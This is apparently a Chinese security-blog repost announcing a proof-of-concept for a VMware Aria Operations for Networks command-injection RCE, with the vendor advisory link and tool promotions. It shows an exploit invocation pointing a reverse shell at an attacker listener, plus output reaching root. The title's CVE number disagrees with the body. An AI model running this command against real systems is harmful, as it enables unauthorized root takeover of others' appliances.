POC速递 - VMWare RCE CVE-2023-2087
2023-6-16 09:13:35 Author: WIN哥学安全(查看原文) 阅读量:64 收藏

        VMWare Aria Operations for Networks (vRealize Network Insight) 在通过 Apache Thrift RPC 接口接受用户输入时容易受到命令注入的攻击。此漏洞允许远程未经身份验证的攻击者以 root 用户身份在底层操作系统上执行任意命令。RPC 接口受可以绕过的反向代理保护。VMware 已将此问题的严重性评估为处于严重严重性范围内,最高 CVSSv3 基本分数为 9.8。恶意行为者可以在设备的“root”上下文中远程执行代码。VMWare 6.x 版本易受攻击。

python CVE-2023-20887.py --url https://192.168.116.100 --attacker 192.168.116.1:1337VMWare Aria Operations for Networks (vRealize Network Insight) pre-authenticated RCE || Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam)(*) Starting handler(+) Received connection from 192.168.116.100(+) pop thy shell! (it's ready)sudo bashiduid=0(root) gid=0(root) groups=0(root)hostnamevrni-platform-release

缓解措施

https://www.vmware.com/security/advisories/VMSA-2023-0012.html

免责声明

本公众号所发布的文章及工具代码等仅限交流学习,本公众号不承担任何责任!如有侵权,请告知我们立即删除。

Tips:

POC下载地址:

点击下方名片进入公众号、回复关键字【230616】获取下载链接

往期精彩

工具获取回复“burp”“awvs”“nessus”“ladon”"Forfity"等可以。

快速攻击全自动化工具JuD

Exp-Tools 1.1.3版本发布

GUI-tools渗透测试工具箱框架

阿波罗自动化攻击评估系统

 微软 Word RCE附PoC

Clash最新远程代码执行漏洞(附POC)

禅道系统权限绕过与命令执行漏洞(附POC)

【附EXP】CVE-2022-40684 & CVE-2022-22954

网络安全应急预案合集

师傅们求点赞,求支持!

文章来源: http://mp.weixin.qq.com/s?__biz=MzkwODM3NjIxOQ==&mid=2247493396&idx=1&sn=49353765c294a2bf4d0b65900b8fbb79&chksm=c0c846e0f7bfcff6a07a9dbe2f2cdbc25d8103a79f0c1b7fb0486fcc1bd86b0190b2cc259e64#rd
如有侵权请联系:admin#unsafe.sh